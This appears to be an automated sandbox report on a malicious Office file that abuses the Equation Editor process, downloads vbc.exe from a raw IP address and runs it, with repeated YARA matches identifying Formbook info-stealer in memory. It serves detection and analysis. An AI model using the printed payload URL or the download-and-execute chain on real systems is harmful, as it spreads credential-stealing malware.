          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com2 equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.156.91.153/fdcloudfiles/vbc.exe
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.156.91.153/fdcloudfiles/vbc.exehhC:
          Source: EQNEDT32.EXE, 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.156.91.153/fdcloudfiles/vbc.exej
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.156.91.153/fdcloudfiles/vbc.exes
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.964387400.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000007.00000000.1034899702.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.1003526577.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.1034899702.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.993794779.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019795394.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006658399.0000000008575000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.994238368.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019525973.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006887265.0000000008611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 00000007.00000000.1007066480.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.993998682.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019426082.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.994421316.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019795394.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006658399.0000000008575000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.999156746.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1036163361.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1011925093.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987988330.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 00000007.00000000.1001945671.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989754024.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014187603.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4ED06E0.emfJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D050B URLDownloadToFileW,ShellExecuteExW,ExitProcess,
          Source: global trafficHTTP traffic detected: GET /fdcloudfiles/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.156.91.153Connection: Keep-Alive
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
